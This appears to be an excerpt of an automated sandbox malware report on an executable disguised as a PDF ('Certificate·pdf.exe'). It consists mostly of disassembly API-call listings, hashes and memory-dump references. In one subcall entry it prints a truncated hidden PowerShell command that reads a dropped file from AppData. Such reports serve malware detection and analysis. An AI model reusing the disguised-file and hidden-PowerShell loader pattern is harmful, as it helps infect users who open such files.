          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
          • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
          • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
          APIs
          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
          • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
          • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
          APIs
          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,Execute: ,?), ref: 00406128
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
          • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
          • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
          APIs
          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
          • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
          • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
          • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
          APIs
          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
          • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
          • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
          • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
          APIs
          • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
          • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
          • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
          • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
          APIs
          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
          APIs
          • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CallbackDispatcherUser
          • String ID:
          • API String ID: 2492992576-0
          • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
          • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
          • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
          • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
          APIs
            • Part of subcall function 004052FF: lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
            • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
            • Part of subcall function 004052FF: lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
            • Part of subcall function 004052FF: SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
            • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
            • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
            • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
            • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
            • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
            • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
          • String ID:
          • API String ID: 2972824698-0
          • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
          • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
          • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
          • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE
          APIs
          • CloseHandle.KERNEL32(FFFFFFFF,004036E0,00000006,?,00000006,00000008,0000000A), ref: 004038B8
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CloseHandle
          • String ID:
          • API String ID: 2962429428-0
          • Opcode ID: 8461db2c02680890d368972fb338d1f1877edd2f058d59b4848caffe6b4250ca
          • Instruction ID: fee85902db54b6f44904e23b6ce20f3966c5b76a7b945246d4899a6689ebb1f0
          • Opcode Fuzzy Hash: 8461db2c02680890d368972fb338d1f1877edd2f058d59b4848caffe6b4250ca
          • Instruction Fuzzy Hash: 9BC0127150070496C5247F759D4FA453A946B41735BA08775B0F9F00F0CB3C5659555A
          APIs
          • GetDlgItem.USER32(?,000003F9), ref: 00404C93
          • GetDlgItem.USER32(?,00000408), ref: 00404C9E
          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
          • LoadBitmapW.USER32(0000006E), ref: 00404CFB
          • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
          • DeleteObject.GDI32(00000000), ref: 00404D71
          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
          • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
          • ShowWindow.USER32(?,00000005), ref: 00404ECB
          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
          • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
          • GlobalFree.KERNEL32(00000000), ref: 004050AB
          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
          • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
          • ShowWindow.USER32(?,00000000), ref: 0040524A
          • GetDlgItem.USER32(?,000003FE), ref: 00405255
          • ShowWindow.USER32(00000000), ref: 0040525C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
          • String ID: $M$N
          • API String ID: 1638840714-813528018
          • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
          • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
          • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
          • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
          APIs
          • GetDlgItem.USER32(?,000003FB), ref: 0040474E
          • SetWindowTextW.USER32(00000000,?), ref: 00404778
          • SHBrowseForFolderW.SHELL32(?), ref: 00404829
          • CoTaskMemFree.OLE32(00000000), ref: 00404834
          • lstrcmpiW.KERNEL32(Execute: ,007A1F20,00000000,?,?), ref: 00404866
          • lstrcatW.KERNEL32(?,Execute: ), ref: 00404872
          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
            • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
            • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
            • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
